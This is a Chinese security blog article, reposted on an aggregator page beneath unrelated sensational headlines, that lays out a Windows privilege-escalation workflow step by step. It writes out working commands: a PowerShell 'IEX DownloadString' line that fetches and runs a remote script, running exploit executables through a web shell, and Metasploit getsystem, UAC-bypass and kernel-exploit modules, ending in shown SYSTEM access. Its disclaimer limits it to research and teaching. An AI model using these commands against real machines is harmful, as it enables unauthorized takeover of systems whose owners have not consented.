终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

Windows提权流程及手法,建议收藏

网安情报攻防站 李白你好 2023-02-26

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。


前言


收集本机systeminfo中补丁信息

在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp

查询exp,选择对应的Exp下载运行

https://i.hacking8.com/https://github.com/SecWiki/windows-kernel-exploits

提权Exp的运行方式,一般有以下几种:

1、直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
2、在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
3、利用MSF等工具
4、C++源码,Python脚本,PowerShell脚本等特殊方式



WinSystemHelper


使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测

https://github.com/brianwrf/WinSystemHelper

上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果

然后在可利用的Exp中任意下载一个并执行即可



Sherlock


Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可

https://github.com/rasta-mouse/Sherlock


# 启动Powershell
$ powershell.exe -exec bypass

# 本地加载脚本
$ Import-Module Sherlock.ps1

# 远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

# 检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns



MSF提权


Getsystem

meterpreter> getsystem

BypassUAC

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
meterpreter> background # 后台session
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>
# 后台session时会返回session_id,如不清楚可以使用命令sessions -l
msf> run


内核提权

# 查询补丁
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

# 查询Exp
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM



参考链接


https://github.com/SecWiki/windows-kernel-exploits

https://github.com/brianwrf/WinSystemHelper

https://github.com/rasta-mouse/Sherlock



往期回顾


记一处任意文件上传没拿到webshell却拿到服务器的故事


记一次支付漏洞的挖掘


实战渗透从弱口令到getshell

文章有问题?点此查看未经处理的缓存